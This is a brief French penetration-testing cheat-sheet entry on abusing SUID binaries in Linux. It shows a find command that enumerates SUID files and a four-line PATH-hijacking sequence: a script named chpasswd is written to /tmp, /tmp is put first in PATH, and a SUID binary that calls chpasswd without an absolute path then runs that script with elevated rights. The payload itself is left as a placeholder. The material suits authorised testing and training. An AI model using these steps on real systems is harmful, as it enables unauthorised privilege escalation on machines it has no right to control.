Abus SUID

Description

Identification des fichiers SUID

find / -perm -4000 2>/dev/null

Exploitation SUID sans chemin absolu

Si un binaire SUID appel un binaire sans indiquer le chemin absolu, il est possible d’en abuser. Par exemple si le fichier SUID nommé “rst_passwd” fait appel à “chpasswd” sans indiquer le chemin absolu, il est possible de créer un script nommé chpasswd qui exécute des instructions bénéficiant des droits SUID.

echo '<PAYLOAD>' > /tmp/chpasswd
chmod +x /tmp/chpasswd
export PATH=/tmp:$PATH
./rst_passwd